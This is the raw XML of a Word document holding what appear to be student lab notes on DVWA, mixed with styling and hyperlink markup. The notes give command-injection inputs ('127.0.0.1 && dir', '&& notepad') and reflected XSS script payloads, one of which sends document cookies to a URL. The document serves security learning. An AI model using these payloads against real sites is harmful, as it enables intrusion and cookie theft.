        <w:t xml:space="preserve"> change directory to c:\ drive</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00141B39" w:rsidRDefault="00141B39">
      <w:r>
        <w:t>Open any folder on c:\</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00141B39" w:rsidRDefault="00141B39">
      <w:r>
        <w:t xml:space="preserve">127.0.0.1 &amp;&amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> c:\mydata\</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00141B39" w:rsidRDefault="00141B39">
      <w:r>
        <w:t xml:space="preserve">Now open text file of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mydata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> folder</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00141B39" w:rsidRDefault="00141B39">
      <w:r>
        <w:t>127.0.0.1 &amp;&amp; notepad c:\mydata\myfile.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00141B39" w:rsidRDefault="00141B39">
      <w:r>
        <w:t>It will open myfile.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00290F0B" w:rsidRDefault="00D21A32">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC77FD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>XSS attack</w:t>
      </w:r>
      <w:r w:rsidR="00200FD6" w:rsidRPr="00AC77FD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007D633D" w:rsidRPr="00AC77FD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="00200FD6" w:rsidRPr="00AC77FD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> reflected</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA673C" w:rsidRPr="00AC77FD" w:rsidRDefault="00BA673C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA673C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>https://www.youtube.com/watch?v=sNya02e5Vp0&amp;list=PLZUQcQP4Xtlp64Q6tzw8GdLsOweBsKDSs&amp;index=8</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="007D633D" w:rsidRDefault="007D633D" w:rsidP="007D633D">
      <w:r>
        <w:t>Type this in textbox it will show the file content</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D21A32" w:rsidRDefault="00EF3DC6">
      <w:r>
        <w:t xml:space="preserve">&lt;script&gt; </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>document.location</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>=’http://127.0.0.1/Users/hp/</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF3DC6">
        <w:t>Downloads</w:t>
      </w:r>
      <w:r>
        <w:t>/test.txt’&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D633D" w:rsidRDefault="007D633D" w:rsidP="007D633D">
      <w:r>
        <w:t>Attacker can also find cookies of the system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D633D" w:rsidRDefault="007D633D" w:rsidP="007D633D">
      <w:r>
        <w:t xml:space="preserve">&lt;script&gt; </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>document.location</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>=’http://127.0.0.1/Users/hp/</w:t>
      </w:r>
      <w:r>
        <w:t>Cookies?’+document.cookies</w:t>
      </w:r>
      <w:r>
        <w:t>&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D633D" w:rsidRDefault="007D633D"/>
    <w:p w:rsidR="00200FD6" w:rsidRDefault="00200FD6"/>
    <w:p w:rsidR="00E7331E" w:rsidRDefault="00E7331E"/>
    <w:p w:rsidR="00E7331E" w:rsidRDefault="00E7331E">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D318D" w:rsidRDefault="009D318D" w:rsidP="009D318D"/>
    <w:sectPr w:rsidR="009D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274"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A5F65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5"/>
    <w:rsid w:val="00020681"/>
    <w:rsid w:val="00023588"/>
    <w:rsid w:val="000633D0"/>
    <w:rsid w:val="000F00EB"/>
    <w:rsid w:val="000F3E35"/>
    <w:rsid w:val="000F6590"/>
    <w:rsid w:val="00141B39"/>
    <w:rsid w:val="001B543A"/>
    <w:rsid w:val="001E4C30"/>
    <w:rsid w:val="00200FD6"/>
    <w:rsid w:val="002610A6"/>
    <w:rsid w:val="00275183"/>
    <w:rsid w:val="00290F0B"/>
    <w:rsid w:val="002E77D5"/>
    <w:rsid w:val="003859BE"/>
    <w:rsid w:val="004651DD"/>
    <w:rsid w:val="005446A5"/>
    <w:rsid w:val="00661BF1"/>
    <w:rsid w:val="007D633D"/>
    <w:rsid w:val="00801770"/>
    <w:rsid w:val="008A04F2"/>
    <w:rsid w:val="008D17DF"/>
    <w:rsid w:val="00930429"/>
    <w:rsid w:val="00955D4A"/>
    <w:rsid w:val="009774A7"/>
    <w:rsid w:val="009A1DD8"/>
    <w:rsid w:val="009D318D"/>
    <w:rsid w:val="00AB1D97"/>
    <w:rsid w:val="00AC77FD"/>
    <w:rsid w:val="00AF72E5"/>
    <w:rsid w:val="00B3165C"/>
    <w:rsid w:val="00BA673C"/>
    <w:rsid w:val="00BB36C5"/>
    <w:rsid w:val="00BF2CD0"/>
    <w:rsid w:val="00D21A32"/>
    <w:rsid w:val="00DB0998"/>
    <w:rsid w:val="00DC1D88"/>
    <w:rsid w:val="00DC5282"/>
    <w:rsid w:val="00DE6323"/>
    <w:rsid w:val="00E246BD"/>
    <w:rsid w:val="00E7331E"/>
    <w:rsid w:val="00EB06A1"/>
    <w:rsid w:val="00EB60DC"/>
    <w:rsid w:val="00EF3DC6"/>
    <w:rsid w:val="00F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FAD1"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{C3AB9F53-2CE9-46B9-AB1E-3910E68A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D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B1D97"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="style-scope">
    <w:name w:val="style-scope"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00EB60DC"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="0038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dvwa/dvwa-master/setup.ph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redirect?event=video_description&amp;redir_token=QUFFLUhqa1Mwb1VPejVoQXl0dmR2LTR3bHNkejl6ckk3d3xBQ3Jtc0tuTXJ0RFNGQkpGSlRvWnUxWS1JaDJnNm05UjVoMU9Kc2pRdXUxZ1NLblFqdmZOdGFZTUhSNHh2Y2NaX0I3aDZBWFUzQWNiMTBUWnB6TDllWXpMdnQ4YWJsZjI1LTlOMEhxWDlHNnBCTDdSYmtvUkxHaw&amp;q=http%3A%2F%2Fgoo.gl%2FYnnpTd&amp;v=GLvrieLufT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/dvwa/dvwa-master/setup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youtube.com/redirect?event=video_description&amp;redir_token=QUFFLUhqbU81MmdyQlRBN1JlLVNKLU56MWpzdUdZMUNDQXxBQ3Jtc0tsM000MVdac2NqeGRudkJfYUQ1Y3RMazlPQm0xZlAweF9rd09abEYwdDN0eE1PTTI4Sk5DQk5kTTI0ZXBiWF95WHB2WktZcU8zTVZ2aXZVZWNmV0ZVMkpkWGZqVGJVRUhDaW5fQkdaWjVzMTRuMFNnSQ&amp;q=https%3A%2F%2Fgoo.gl%2FMZnCcx&amp;v=GLvrieLuf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redir_token=QUFFLUhqa1Mwb1VPejVoQXl0dmR2LTR3bHNkejl6ckk3d3xBQ3Jtc0tuTXJ0RFNGQkpGSlRvWnUxWS1JaDJnNm05UjVoMU9Kc2pRdXUxZ1NLblFqdmZOdGFZTUhSNHh2Y2NaX0I3aDZBWFUzQWNiMTBUWnB6TDllWXpMdnQ4YWJsZjI1LTlOMEhxWDlHNnBCTDdSYmtvUkxHaw&amp;q=http%3A%2F%2Fgoo.gl%2FYnnpTd&amp;v=GLvrieLufT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/dvwa/dvwa-master/setup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digininja/DVWA" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/redirect?event=video_description&amp;redir_token=QUFFLUhqbU81MmdyQlRBN1JlLVNKLU56MWpzdUdZMUNDQXxBQ3Jtc0tsM000MVdac2NqeGRudkJfYUQ1Y3RMazlPQm0xZlAweF9rd09abEYwdDN0eE1PTTI4Sk5DQk5kTTI0ZXBiWF95WHB2WktZcU8zTVZ2aXZVZWNmV0ZVMkpkWGZqVGJVRUhDaW5fQkdaWjVzMTRuMFNnSQ&amp;q=https%3A%2F%2Fgoo.gl%2FMZnCcx&amp;v=GLvrieLufT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y5beFVL-cME&amp;list=PLZUQcQP4Xtlp64Q6tzw8GdLsOweBsKDSs&amp;inde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recaptcha/admin/create" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/burp/releases/professional-community-2022-8-4?requestededition=community&amp;requested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2022-09-13T07:38:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-09-14T08:44:00Z</dcterms:modified>
</cp:coreProperties>
</file>